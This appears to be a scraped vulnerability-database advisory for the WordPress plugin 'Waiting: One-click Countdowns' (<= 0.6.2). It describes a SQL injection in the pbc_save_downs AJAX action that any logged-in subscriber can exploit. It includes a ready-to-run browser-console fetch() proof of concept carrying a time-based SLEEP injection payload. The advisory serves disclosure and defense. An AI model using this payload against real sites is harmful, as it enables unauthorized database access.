Lucene search

K
wpexploitWpvulndbWPEX-ID:C89EAE1A-B8D8-4AF1-BD6D-5A9A326FAAD6
HistoryMar 22, 2023 - 12:00 a.m.

Waiting: One-click Countdowns <= 0.6.2 - Subscriber+ SQLi

2023-03-2200:00:00
wpvulndb
68
web browser command
sql injection
developer console
exploit
subscriber user
admin-ajax file
post request

0.001 Low

EPSS

Percentile

31.1%

The plugin does not properly sanitise and escape the pbc_down[meta][id] parameter before using it in a SQL statement via the pbc_save_downs AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=pbc_save_downs&pbc_down[meta][id]=1+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)--',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

0.001 Low

EPSS

Percentile

31.1%

Related for WPEX-ID:C89EAE1A-B8D8-4AF1-BD6D-5A9A326FAAD6